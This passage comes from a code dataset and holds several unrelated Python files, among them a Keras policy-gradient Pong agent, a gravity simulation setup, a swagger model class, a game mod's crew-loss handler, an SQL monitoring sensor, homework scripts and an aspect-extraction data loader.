(8, 8), kernel_initializer=\"he_uniform\", strides=(4,4), activation=\"relu\", padding=\"same\"))\n model.add(Conv2D(32, (4, 4), kernel_initializer=\"he_uniform\", activation=\"relu\", padding=\"same\", strides=(2, 2)))\n model.add(Flatten())\n model.add(Dense(128, kernel_initializer=\"he_uniform\", activation=\"relu\"))\n #model.add(Dense(32, kernel_initializer=\"he_uniform\", activation=\"relu\"))\n print(self.action_size)\n model.add(Dense(self.action_size, activation='softmax'))\n optimizer = RMSprop(lr=1e-4, rho=0.9)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n return model\n\n def init_game_setting(self):\n \"\"\"\n\n Testing function will call this function at the begining of new game\n Put anything you want to initialize if necessary\n\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n self.prev_x = None\n\n def get_action(self, state):\n state = state.reshape([1, state.shape[0], state.shape[1], state.shape[2]])\n aprob = self.model.predict(state, batch_size=1).flatten()\n self.probabilities.append(aprob)\n prob = aprob / np.sum(aprob)\n action = np.random.choice(self.action_size, 1, p=prob)[0]\n return action, prob\n\n def remember(self, state, action, prob, reward):\n y = np.zeros([self.action_size])\n y[action] = 1\n self.gradients.append(np.array(y).astype('float32') - prob)\n self.states.append(state)\n self.rewards.append(reward)\n\n def discount_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n running_add = 0\n for t in reversed(range(0, rewards.size)):\n if rewards[t] != 0:\n running_add = 0\n running_add = running_add * self.gamma + rewards[t]\n discounted_rewards[t] = running_add\n return discounted_rewards\n\n def pg_one(self):\n gradients = np.vstack(self.gradients)\n rewards = np.vstack(self.rewards)\n rewards = self.discount_rewards(rewards)\n rewards = rewards / np.std(rewards - np.mean(rewards))\n gradients *= rewards\n X = np.vstack([self.states])\n Y = self.probabilities + self.learning_rate * np.squeeze(np.vstack([gradients]))\n self.model.train_on_batch(X, Y)\n self.states, self.probabilities, self.gradients, self.rewards = [], [], [], []\n\n def train(self):\n \"\"\"\n Implement your training algorithm here\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n done = False\n running_reward = None\n episode = 0\n score = 0\n #self.model = keras.models.load_model('./save_model/pong.h5')\n prev_x = None\n state = self.env.reset()\n\n while True:\n cur_x = preprocess_frame(state)\n x = cur_x - prev_x if prev_x is not None else np.zeros([1, 80, 80])\n prev_x = cur_x\n\n action, prob = self.get_action(x)\n state, reward, done, info = self.env.step(action)\n score += reward\n self.remember(x, action, prob, reward)\n if(done):\n episode +=1\n self.pg_one()\n print('Episode: %d - Score: %f.' % (episode, score))\n running_reward = score if running_reward is None else running_reward * 0.99 + score * 0.01\n print('resetting env. 
running mean: %f' % (running_reward))\n state = self.env.reset()\n self.scores.append(score)\n score = 0\n prev_x = None\n self.model.save('./save_model/pong.h5')\n if running_reward > 3:\n break\n #plt.figure()\n #plt.plot(range(episode), self.scores)\n #plt.savefig('pong.png')\n npy = np.asarray(self.scores)\n np.save('scores.npy', npy)\n\n def make_action(self, observation, test=True):\n \"\"\"\n Return predicted action of your agent\n\n Input:\n observation: np.array\n current RGB screen of game, shape: (210, 160, 3)\n\n Return:\n action: int\n the predicted action from trained model\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n cur_x = preprocess_frame(observation)\n x = cur_x - self.prev_x if self.prev_x is not None else np.zeros([1, 80, 80])\n self.prev_x = cur_x\n #state = x.reshape([1, x.shape[0]])\n state = x.reshape([1, x.shape[0], x.shape[1], x.shape[2]])\n action_prob = self.model.predict(state, batch_size=1).flatten()\n # self.probs.append(action_prob)\n prob = action_prob / np.sum(action_prob)\n action = np.random.choice(self.action_size, 1, p=prob)[0]\n return action\n # return self.env.get_random_action()\n\n","sub_path":"hw3/agent_dir/agent_pg.py","file_name":"agent_pg.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"547291094","text":"from spacesim import SpaceSim\nfrom spaceobject import SpaceObject\n\nfrom pygameinterface import PygameInterface\n\n\nsun = SpaceObject(\n name ='sun',\n mass = 1.99e+30,\n radius = 6.96e+8,\n pos = (0,0),\n vel = (0,0),\n color = (255, 255, 0),\n)\n \nearth = SpaceObject(\n name ='earth',\n mass = 5.98e+24,\n radius = 6.37e+6,\n pos = (-1.5e+11, 0),\n vel = (0, 29.8e+8),\n color = (0, 100, 255),\n)\n\n\nmoon = SpaceObject(\n name ='moon',\n mass = 7.36e+22,\n radius = 1.74e+6,\n pos = (-1.5e+11 + 3.82e+8, 0),\n vel = (0, 29.8e+8 + 990 ),\n color = (220, 220, 220),\n)\n \nSpaceObjects = [earth, moon, sun]\n\ninterface = PygameInterface(\n window_size = (1100, 800),\n camera_center = (0, 0),\n camera_zoom = .000000001,\n camera_zoom_step = .9,\n camera_scroll_step = 200,\n\n)\n\n\nsim = SpaceSim(\n SpaceObjects = SpaceObjects, \n G = 1,\n maxstep = 1e+40,\n interface=interface\n)\n\nsim.run()\n\n","sub_path":"earthsunmoon.py","file_name":"earthsunmoon.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"385051395","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom crawler.models.base_model_ import Model\nfrom crawler import util\n\n\nclass Failure(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n \"\"\"Failure - a model defined in Swagger\n\n :param error_message: The error_message of this Failure. # noqa: E501\n :type error_message: str\n :param error_code: The error_code of this Failure. 
# noqa: E501\n        :type error_code: int\n        \"\"\"\n        self.swagger_types = {\n            'error_message': str,\n            'error_code': int\n        }\n\n        self.attribute_map = {\n            'error_message': 'error_message',\n            'error_code': 'error_code'\n        }\n\n        self._error_message = error_message\n        self._error_code = error_code\n\n    @classmethod\n    def from_dict(cls, dikt) -> 'Failure':\n        \"\"\"Returns the dict as a model\n\n        :param dikt: A dict.\n        :type: dict\n        :return: The Failure of this Failure.  # noqa: E501\n        :rtype: Failure\n        \"\"\"\n        return util.deserialize_model(dikt, cls)\n\n    @property\n    def error_message(self) -> str:\n        \"\"\"Gets the error_message of this Failure.\n\n\n        :return: The error_message of this Failure.\n        :rtype: str\n        \"\"\"\n        return self._error_message\n\n    @error_message.setter\n    def error_message(self, error_message: str):\n        \"\"\"Sets the error_message of this Failure.\n\n\n        :param error_message: The error_message of this Failure.\n        :type error_message: str\n        \"\"\"\n\n        self._error_message = error_message\n\n    @property\n    def error_code(self) -> int:\n        \"\"\"Gets the error_code of this Failure.\n\n\n        :return: The error_code of this Failure.\n        :rtype: int\n        \"\"\"\n        return self._error_code\n\n    @error_code.setter\n    def error_code(self, error_code: int):\n        \"\"\"Sets the error_code of this Failure.\n\n\n        :param error_code: The error_code of this Failure.\n        :type error_code: int\n        \"\"\"\n\n        self._error_code = error_code\n","sub_path":"crawler/models/failure.py","file_name":"failure.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"560916139","text":"import os\nimport shutil\nimport tempfile\nimport json\n\nfrom functools import wraps  # used by skip_if below; missing from the original imports\nfrom unittest import TestCase\nfrom IPython import embed\n\nVERBOSITY = 1  # assumed default; the original snippet references VERBOSITY without defining it\n\ndef skip_if(expr):\n    def decorator(method):\n        @wraps(method)\n        def inner(self):\n            should_skip = expr() if callable(expr) else expr\n            if not should_skip:\n                return method(self)\n            elif VERBOSITY > 1:\n                print('Skipping %s test.' % method.__name__)\n        return inner\n    return decorator\n\n\ndef skip_unless(expr):\n    return skip_if((lambda: not expr()) if callable(expr) else not expr)
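\n\n# Example usage (illustrative, not from the original file):\n#     @skip_unless(lambda: os.path.exists('/some/test/data'))\n#     def test_something(self): ...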
\n\n\ndef skip_case_if(expr):\n    def decorator(klass):\n        should_skip = expr() if callable(expr) else expr\n        if not should_skip:\n            return klass\n        elif VERBOSITY > 1:\n            print('Skipping %s test.' % klass.__name__)\n        class Dummy(object): pass\n        return Dummy\n    return decorator\n\n\ndef skip_case_unless(expr):\n    return skip_case_if((lambda: not expr()) if callable(expr) else not expr)\n\ntest_files_dir = os.path.abspath(os.path.join(__file__, '../gen3_test_files'))\nefi_network_path = os.path.join(test_files_dir, 'network_1393')\n\ndefault_train_settings = {'dataset_path': os.path.join(test_files_dir, 'unstable_training_gen3_4D_nions0_flat_filter8.h5.1'),\n                          'drop_outlier_above': 0.999,\n                          'drop_outlier_below': 0.001,\n                          'hidden_neurons': [16, 16],\n                          'hidden_activation': ['tanh', 'tanh'],\n                          'drop_chance': 0.0,\n                          'output_activation': 'none',\n                          'standardization': 'normsm_1_0',\n                          'calc_standardization_on_nonzero': True,\n                          'goodness_only_on_unstable': True,\n                          'goodness': 'mse',\n                          'cost_l2_scale': 8e-06,\n                          'cost_l1_scale': 0.0,\n                          'cost_stable_positive_scale': 0.0,\n                          'cost_stable_positive_offset': -5.0,\n                          'cost_stable_positive_function': \"block\",\n                          'early_stop_after': 15,\n                          'early_stop_measure': 'loss',\n                          'minibatches': 10,\n                          'weight_init': 'normsm_1_0',\n                          'bias_init': 'normsm_1_0',\n                          'validation_fraction': 0.05,\n                          'test_fraction': 0.05,\n                          'dtype': 'float32',\n                          'optimizer': 'adam',\n                          'learning_rate': 0.001,\n                          'lbfgs_maxfun': 1000,\n                          'lbfgs_maxiter': 15000,\n                          'lbfgs_maxls': 20,\n                          'adam_beta1': 0.9,\n                          'adam_beta2': 0.999,\n                          'adadelta_rho': 0.95,\n                          'rmsprop_decay': 0.9,\n                          'rmsprop_momentum': 0.0,\n                          'max_epoch': 1,\n                          'steps_per_report': None,\n                          'epochs_per_report': None,\n                          'save_checkpoint_networks': None,\n                          'save_best_networks': None,\n                          'track_training_time': None,\n                          'train_dims': ['efiITG_GB']}\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611843517","text":"'''\nAuthor: Puffrora\nDate: 2020-12-08 17:47:48\nLastModifiedBy: Puffrora\nLastEditTime: 2020-12-08 17:58:02\n'''\n\n\n'''\nThis can be reduced to counting the contiguous subarrays of an array in which\nadjacent elements differ by exactly 1 (in the wrap-around alphabet).\nNote that z followed by a is the special case here.\n'''\nclass Solution:\n    def findSubstringInWraproundString(self, p):\n\n        from collections import defaultdict\n\n        # ! prepend a sentinel so p[i-1] is always defined in the loop below\n        p = '#' + p\n        \n        # ! window is the length of the valid consecutive run ending at the current letter\n        window = 1\n\n        # ! key is a letter, value is a length: the longest consecutive substring ending with that key\n        len_mapper = defaultdict(int)\n        \n        for i in range(1, len(p)):\n            if ord(p[i]) - ord(p[i-1]) in [1, -25]:\n                window += 1\n            else:\n                window = 1\n            \n            # ! only keep the maximum run length ending at this key, to avoid double counting, e.g. 'cac'\n            len_mapper[p[i]] = max(len_mapper[p[i]], window)\n\n        return sum(len_mapper.values())
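\n\n# Worked example (illustrative): for p = 'zab' the windows are 1, 2, 3, so\n# len_mapper == {'z': 1, 'a': 2, 'b': 3} and the answer is 1 + 2 + 3 = 6\n# (the substrings z, a, b, za, ab, zab).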
\n\n","sub_path":"Leetcode/leetcode467 环绕字符串中唯一的子字符串.py","file_name":"leetcode467 环绕字符串中唯一的子字符串.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586105779","text":"# This script controls weapon firing on a ship and if needed decreases the current crew count...\n\n# by Sov\n\n# Imports\nimport App\nfrom Custom.DS9FX.DS9FXLib import DS9FXLifeSupportLib\nfrom Custom.DS9FX.DS9FXLifeSupport import LifeSupport_dict, HandlePlugins\nfrom Custom.DS9FX.DS9FXEventManager import DS9FXGlobalEvents\n\n# Functions\ndef HandleWeaponsFire(pObject, pEvent): \n    pHit = pEvent.IsHullHit()\n    if not pHit == 1:\n        return 0 \n\n    pDamage = pEvent.GetDamage()\n    if pDamage <= 0:\n        return 0\n\n    pShip = App.ShipClass_Cast(pEvent.GetDestination())\n    if not pShip:\n        return 0\n    \n    pShipID = pShip.GetObjID()\n    if not pShipID:\n        return 0\n    \n    pHullMax = pShip.GetHull().GetMaxCondition()\n    if not pHullMax:\n        return 0\n\n    if not LifeSupport_dict.dCrew.has_key(pShipID):\n        return 0\n\n    fShieldStats = DS9FXLifeSupportLib.GetShieldPerc(pShip)\n    if fShieldStats > 25:\n        return 0\n\n    pTechStats = HandlePlugins.RetriveStatus(pObject, pEvent)\n    if not pTechStats:\n        return 0\n\n    # To calculate properly we need the defined max crew value, not the current one...\n    pShipType = DS9FXLifeSupportLib.GetShipType(pShip)\n    if not pShipType:\n        return 0\n\n    fMaxCrew = DS9FXLifeSupportLib.GetShipMaxCrewCount(pShip, pShipType)\n    if not fMaxCrew:\n        return 0\n\n    fModifier = float(pDamage)/float(pHullMax)\n    fModifier = float(fModifier)*float(fMaxCrew)\n    iModifier = int(fModifier)\n\n    iNewCrew = LifeSupport_dict.dCrew[pShipID]\n    iNewCrew = iNewCrew - iModifier\n    if iNewCrew <= 0:\n        iNewCrew = 0\n        pShip.ClearAI()\n        DS9FXLifeSupportLib.GroupCheck(pShip)\n        DS9FXLifeSupportLib.PlayerCheck(pShipID)\n        DS9FXGlobalEvents.Trigger_Ship_Dead_In_Space(pShip)\n\n    LifeSupport_dict.dCrew[pShipID] = iNewCrew\n\n    DS9FXGlobalEvents.Trigger_Combat_Effectiveness(pShip)\n","sub_path":"scripts/Custom/DS9FX/DS9FXLifeSupport/HandleWeaponHit.py","file_name":"HandleWeaponHit.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383717106","text":"# Problem 1\r\n# Print the perfect numbers from 1 to 1000 to the screen\r\n# (--> not covered in the handout).\r\n# For this, write a function that returns whether a number is perfect.\r\n\r\n# A number is perfect if the sum of its divisors\r\n# equals the number itself.\r\n# For example, 6 is a perfect number (1 + 2 + 3 = 6).\r\n\r\n\r\ndef muk(sayi):\r\n    top = 0\r\n    for i in range(1, sayi):\r\n        if sayi % i == 0:\r\n            top += i\r\n    return sayi == top
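\r\n\r\n# Example (illustrative): muk(6) -> True, muk(28) -> True,\r\n# muk(12) -> False (1 + 2 + 3 + 4 + 6 = 16 != 12).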
\r\n\r\n\r\nfor i in range(1, 1001):\r\n    if muk(i):\r\n        print(\"perfect\", i)\r\n","sub_path":"Fonksiyonlar/hw-1.py","file_name":"hw-1.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"299973383","text":"#Create two empty lists\nnumbers = list()\nwords = list()\n\n#Get five values from user and sort them\nwhile len(numbers) + len(words) < 5:\n    userData = input(\"Enter an integer or word: \")\n    if userData.isdigit():\n        numbers.append(userData)\n    else:\n        words.append(userData)\n\n#Print out the data organized by numeric values then others.\nprint(\"\\nThe numbers you entered were: {}\\nThe words you entered were: {}\".format(numbers, words))\n\n#Print out all the data as a single string\nprint(\"All the data you entered was: {}\\n\".format(', '.join(numbers + words)))\n\n","sub_path":"LessonEleven/listDataTypes.py","file_name":"listDataTypes.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"150612364","text":"if __name__ == '__main__':\n    from cottages import cottage\nelse:\n    from .cottages import cottage\n\n\ndef menu(MENU, cottage1):\n    print(\"------------------------------\")\n    print(\"You are welcome in \" + cottage1.name)\n    for i, item in enumerate(MENU):\n        print(\"{0:2}. {1}\".format(i, item[0]))\n    print(\"------------------------------\")\n    return int(input())\n\ndef startMenu():\n    try:\n        cottage1 = cottage()\n        MENU = [\n            ['Add house', cottage1.addHouse],\n            ['Output house(s)', cottage1.outputHouse],\n            ['Change house', cottage1.changeHouse],\n            ['Read cottage from file', cottage1.readFromFile],\n            ['Write cottage to file', cottage1.writeToFile],\n            ['Clear cottage', cottage1.clearCottage]\n        ]\n        while True:\n            MENU[menu(MENU, cottage1)][1]()\n    except Exception as ex:\n        print(ex, \"\\nbye\")","sub_path":"asm1905/st02/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"160705331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCheck connection with SQL database.\n'''\nimport timeit\n\nfrom whmonit.client.sensors import TaskSensorBase\n\n\nclass Sensor(TaskSensorBase):\n    '''\n    Check SQL sensor class.\n\n    Sent results:\n    * result: the rows returned by executing the query, separated by commas\n    * timeit: the time it took to execute the query (it includes time spent on\n    sending and receiving data from the server)\n\n    As for returned error messages: there is a great number of SQL errors\n    and they're never precise. What's more, different drivers may raise\n    different errors in the same situations.\n    Also, be careful using sqlite: for example, connecting to a non-existent\n    database creates the file instead of raising an error.\n\n    This sensor reports either an error while connecting (including timeout)\n    or an error while executing the query.\n    The errors generally might be:\n    * DBAPI errors as returned by the database - they come in the form\n    (Type)message; OperationalError seems to be the most common, for the full list\n    see http://legacy.python.org/dev/peps/pep-0249/#exceptions\n    * StatementError - any kind of wrong statement (including DBAPI errors)\n    * several others included in SQLAlchemyError like CompileError,\n    ArgumentError, ResourceClosedError\n\n    Drivers used: psycopg2, mysql-python, cx_oracle, pyodbc (mssql)\n\n    Those drivers will usually require the database client to be installed on\n    the machine (oracle is non-free, mysql requires the package\n    libmysqlclient-dev). 
Message about lack of driver is sent through\n error stream.\n '''\n\n name = 'check_sql'\n streams = {\n 'result': {\n 'type': str,\n 'description': 'Query result.',\n },\n 'result_num': {\n 'type': float,\n 'description': 'Query result numeric.',\n },\n 'query_time': {\n 'type': float,\n 'description': 'Time taken to execute the query.',\n },\n }\n\n # TODO #1671: Better way for getting raw config\n config_raw = config_schema = {\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'object',\n 'properties': {\n 'dbtype': {\n 'type': 'string',\n 'enum': ['postgresql', 'mysql', 'oracle', 'mssql', 'sqlite']\n },\n 'host': {\n 'type': 'string',\n 'default': '',\n 'description': 'Server address. '\n 'Can be IP, hostname, socket or sqlite file.'\n },\n 'port': {\n 'type': 'integer',\n 'minimum': 1,\n 'maximum': 65535,\n 'description': 'Port to the server. Defaults to driver default.'\n },\n 'username': {\n 'type': 'string',\n 'description': 'Database username. '\n 'Not necessary for unix domain socket.'\n },\n 'password': {\n 'type': 'string',\n 'description': 'Database password. '\n 'Not necessary for unix domain socket.'\n },\n 'database': {\n 'type': 'string',\n 'description': 'Name of the database.'\n },\n 'query': {\n 'type': 'string',\n 'description': 'SQL query to send to database.'\n }\n },\n 'required': ['dbtype', 'host', 'query'],\n 'additionalProperties': False\n }\n\n def do_run(self):\n # R0914: Too many local variables.\n # pylint: disable=R0914\n\n import sqlalchemy\n from sqlalchemy import exc\n from sqlalchemy.event import listen\n from sqlalchemy.engine.url import URL\n\n def start_query(conn, *dummy):\n ''' Save time the query starts. '''\n conn.info['wh_time'] = timeit.default_timer()\n\n def end_query(conn, *dummy):\n ''' Save time the query's finished. '''\n conn.info['wh_time'] = timeit.default_timer() - conn.info['wh_time']\n\n config = {\n k: v for k, v in self.config.iteritems()\n if k in self.config_raw['properties'].keys()\n }\n config['drivername'] = config.pop('dbtype')\n\n if config['drivername'] == 'sqlite':\n config['database'] = config.pop('host')\n\n query = config.pop('query')\n\n url = URL(**config)\n\n try:\n engine = sqlalchemy.create_engine(url)\n except ImportError as err:\n return ((\n 'error',\n '{}. Sensor checking sql requires it. 
Please install it.'\n                .format(err)\n            ),)\n\n        error_msg = (\n            '(database {})\\nError: {{}}\\n Message from database: \"{{}}\"'\n            .format(url.__to_string__())\n        )\n        try:\n            connection = engine.connect()\n        except exc.TimeoutError:\n            return (\n                ('error', error_msg.format('Timeout getting connection', None)),\n            )\n        except exc.SQLAlchemyError as err:\n            return (\n                ('error', error_msg.format('Could not connect to database', err)),\n            )\n\n        listen(connection, 'before_cursor_execute', start_query)\n        listen(connection, 'after_cursor_execute', end_query)\n        try:\n            result = connection.execute(query).fetchall()\n            time = connection.info['wh_time']\n        except exc.StatementError as err:\n            return ((\n                'error', error_msg.format(\n                    'Error executing statement {}'.format(err.statement), err)\n            ),)\n        except exc.SQLAlchemyError as err:\n            return ((\n                'error', error_msg.format(\n                    'Error executing statement, your query: {}'.format(\n                        self.config['query']),\n                    err.message)\n            ),)\n        finally:\n            connection.close()\n\n        try:\n            if len(result) == 1 and len(result[0]) == 1:\n                result = ('result_num', float(result[0][0]))\n            else:\n                raise ValueError\n        except ValueError:\n            result = ('result', str(result)[1:-1])\n\n        return (result, ('query_time', time))\n","sub_path":"whmonit/client/sensors/check_sql/linux_01.py","file_name":"linux_01.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311264820","text":"def posi(N, r, c):  # returns which quadrant of the whole grid (r, c) lies in (quadrant 1: 0, quadrant 2: 1, ...)\n    if r < 2**(N-1):\n        if c < 2**(N-1):\n            return 0\n        else:\n            return 1\n    elif c < 2**(N-1):\n        return 2\n    else:\n        return 3\ndef lastnrc(N, r, c):  # returns, as a tuple, the values of N, r, c at the previous level (2^(N-1))\n    p = posi(N, r, c)\n    if p == 0:\n        return (N-1, r, c)\n    elif p == 1:\n        return (N-1, r, c-2**(N-1))\n    elif p == 2:\n        return (N-1, r-2**(N-1), c)\n    elif p == 3:\n        return (N-1, r-2**(N-1), c-2**(N-1))\ndef find(tup):\n    if tup[0] == 1:\n        return posi(tup[0], tup[1], tup[2])\n    last_ans = find(lastnrc(tup[0], tup[1], tup[2]))\n    return last_ans + (2**(2*tup[0]-2))*posi(tup[0], tup[1], tup[2])\n\nN, r, c = map(int, input().split())\n\nprint(find((N, r, c)))","sub_path":"junhee/divide_conquer/Z_1074.py","file_name":"Z_1074.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"94249001","text":"import os \nimport pickle\nimport numpy as np \nfrom keras.preprocessing.sequence import pad_sequences\n#import torch\nfrom gensim.models import Word2Vec\nfrom keras.utils.np_utils import to_categorical\nfrom nltk.corpus import stopwords\n\n\nclass Data_Loader():\n\tdef __init__(self, batch_size, domain, emb_size):\n\t\tself.batch_size = batch_size\n\t\t# self.sent_len = sent_len\n\t\t# self.maxlen = maxlen\n\t\t# fr = open('data.pkl', 'rb')\n\t\t# fr = open('data_cat_laptop.pkl', 'rb')\n\t\tself.domain = domain \n\t\tif domain == 'rest':\n\t\t\tdata_file = './pkl/data_rest_2016_2.pkl'\n\t\t\t# data_file = 'data_rest.pkl'\n\t\telse:\n\t\t\tdata_file='./pkl/data_laptop_2014.pkl'\n\t\t\t# data_file = 'data_cat_laptop.pkl'\n\t\tfr = open(data_file, 'rb')\n\t\tdata = pickle.load(fr)\n\n\t\tself.word2idx = data['word2idx']\n\t\tself.idx2word = data['idx2word']\n\n\t\tself.clabel2idx = data['clabel2idx']\n\t\tself.idx2clabel = data['idx2clabel']\n\n\n\t\tself.vocab_size = data['vocab_size']\n\t\t# self.emb_size = data['emb_size']\n\n\t\t# self.label_mask = data['label_mask']\n\n\n\t\tself.num_tag = len(data['tag2idx'])+1\n\n\t\tself.num_cat = 
data['num_cat']\n\t\tself.clabels = data['cat_labels']\n\t\t# self.clabels = to_categorical(self.clabels, self.num_cat)\n\t\tself.clabels = self.my_categorical(self.clabels, self.num_cat)\n\t\t# self.clabel_mask = self.get_cat_mask(self.clabels, data['clabel2idx'])\n\n\n\t\t\n\n\n\n\t\t# self.emb_size = 100\n\t\t# self.gen_size = 100\n\t\tself.emb_size = emb_size\n\t\tself.gen_size = emb_size\n\n\t\tself.psent \t= data['processed_sentence']\n\t\tself.rsent \t= data['raw_sentence']\n\t\tlabels \t\t= data['labels']\n\t\ttags = data['tags']\n\n\n\t\t# sentences, tags, labels \t= self.filter_stopwords(self.psent, tags, labels, data['idx2word'])\n\t\tsentences = self.psent\n\n\t\ttfidf \t\t= self.my_tfidf(sentences, self.clabels)\n\n\t\t\n\t\t# labels = self.get_label_from_file('./data/sent_annot.txt')\n\t\tassert len(labels) == len(sentences)\n\n\t\t# self.maxlen = max([len(sent) for sent in sentences])\n\t\t# self.maxlen = int(np.mean([len(sent) for sent in sentences]))\n\t\tself.maxlen = 36\n\n\t\t\n\t\t# sentences = pad_sequences(sentences,self.maxlen, padding='post')\n\n\t\t# tags = data['tags']\n\t\t# tags = pad_sequences(tags, self.maxlen, padding='post')\n\n\n\n\t\t# print(labels)\n\t\tself.emb_mat = self.embed_mat()\n\t\tself.gen_mat = self.genel_mat()\n\n\n\t\tself.labels \t= pad_sequences(labels, self.maxlen)\n\n\t\tself.sent \t\t= pad_sequences(sentences, self.maxlen)\n\n\t\tself.tfidf \t\t= pad_sequences(tfidf, self.maxlen)\n\n\t\t# self.sent_tag \t= to_categorical(pad_sequences(tags, self.maxlen), self.num_tag)\n\t\tself.sent_tag = pad_sequences(tags, self.maxlen)\n\n\t\tself.mask \t\t= np.ones((len(self.sent), self.maxlen))\n\n\t\tself.mask[self.sent==0] = 0\n\t\tself.pointer = 0\n\n\n\t\tself.data_size = len(self.sent)\n\n\t\t# if 'permutation' not in data:\n\t\t# \tself.permutation = np.random.permutation(self.data_size)\n\t\t# \tdata['permutation'] = self.permutation\n\t\t# \tpickle.dump(data,open(data_file, 'wb'))\n\t\t# else:\n\t\t# \tself.permutation = data['permutation']\n\n\t\tself.permutation = np.arange(self.data_size)\n\n\t\t# self.train_val_test() ## it splits training testing here\n\t\tself.train_test_split(self.permutation) ## it splits training testing here\n\n\tdef my_tfidf(self, sents, clabels):\n\t\tclabel2sent = {}\n\t\tword2sent = {}\n\n\t\tfor i,sent in enumerate(sents):\n\t\t\tfor token in sent:\n\t\t\t\tif token not in word2sent:\n\t\t\t\t\tword2sent[token] = [i]\n\t\t\t\telif i not in word2sent[token]:\n\t\t\t\t\tword2sent[token].append(i)\n\t\t\tfor clabel in clabels[i]:\n\t\t\t\tif clabel not in clabel2sent:\n\t\t\t\t\tclabel2sent[clabel] = [i]\n\t\t\t\telse:\n\t\t\t\t\tclabel2sent[clabel].append(i)\n\n\t\ttfidf = []\n\t\tfor sent in sents:\n\t\t\tfrom collections import Counter\n\t\t\t# print(sent)\n\t\t\tcounter = Counter(sent)\n\t\t\ttemp_tfidf = []\n\t\t\tfor token in sent:\n\t\t\t\ttf = counter[token]\n\t\t\t\tidf = np.log(len(sents)*1.0/len(word2sent[token])+1)\n\t\t\t\ttemp_tfidf.append(tf*idf)\n\t\t\ttfidf.append(temp_tfidf)\n\t\treturn tfidf\n\n\n\n\n\tdef filter_stopwords(self, sentences, tags, labels, idx2word):\n\t\timport string\n\t\tascii_ = [c for c in string.ascii_lowercase]\n\t\tstop = stopwords.words('english')\n\t\tto_filter = ascii_+stop\n\n\t\tres_sent = []\n\t\tres_tags = []\n\t\tres_label= []\n\t\tfor sentence, tag, label in zip(sentences,tags,labels):\n\t\t\ttemp_sent = []\n\t\t\ttemp_tags = []\n\t\t\ttemp_label= []\n\t\t\tfor i,token in enumerate(sentence):\n\t\t\t\tif idx2word[token] in 
to_filter:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttemp_sent.append(token)\n\t\t\t\t\ttemp_tags.append(tag[i])\n\t\t\t\t\ttemp_label.append(label[i])\n\t\t\tres_sent.append(temp_sent)\n\t\t\tres_tags.append(temp_tags)\n\t\t\tres_label.append(temp_label)\n\t\t\t# temp = [token for token in sentence if idx2word[token] not in to_filter]\n\t\t\t# sent.append(temp)\n\t\treturn res_sent, res_tags, res_label\n\n\t\t\n\tdef get_cat_mask(self, clabels, clabel2idx):\n\t\tcat_mask = []\n\t\tindex = clabel2idx['unknown']\n\t\tfor clabel in clabels:\n\t\t\tif len(clabel)==0 and clabel[0]==index:\n\t\t\t\tcat_mask.append(0)\n\t\t\telse:\n\t\t\t\tcat_mask.append(1)\n\t\treturn np.array(cat_mask, dtype = np.float32)\n\n\tdef my_categorical(self, labels, num_class):\n\t\tres = []\n\t\tfor label in labels:\n\t\t\ttemp = np.zeros(num_class)\n\t\t\ttemp[label] = 1\n\t\t\tres.append(temp)\n\t\treturn np.array(res,dtype = np.float32)\n\t\t# return res.astype(np.float32)\n\n\t\t# print(self.train_size)\n\tdef get_label_from_file(self,filename):\n\t\tfr = open(filename)\n\t\tdata = fr.readlines()\n\t\tfr.close()\n\t\tlabels = []\n\t\tfor i in range(1,len(data),2):\n\t\t\tline = data[i].strip()\n\t\t\tlistfromline = line.split()\n\t\t\tlabel = list(map(int,listfromline))\n\t\t\tlabels.append(label)\n\t\treturn labels\n\n\tdef embed_mat(self):\n\t\tif self.domain == 'laptop':\n\t\t\t# model = Word2Vec.load('gensim_laptop')\n\t\t\tmodel = Word2Vec.load('./pkl/gensim_laptop_2014_'+str(self.emb_size))\n\t\telse:\n\t\t\t# model = Word2Vec.load('new_gensim_rest')\n\t\t\tmodel = Word2Vec.load('./pkl/gensim_rest_2016_2_'+str(self.emb_size))\n\t\tmat = np.random.uniform(-1,1,(self.vocab_size, self.emb_size))\n\t\tfor i in range(1,self.vocab_size):\n\t\t\tmat[i] = model[self.idx2word[i]]\n\t\treturn mat\n\n\tdef genel_mat(self):\n\t\tif self.domain 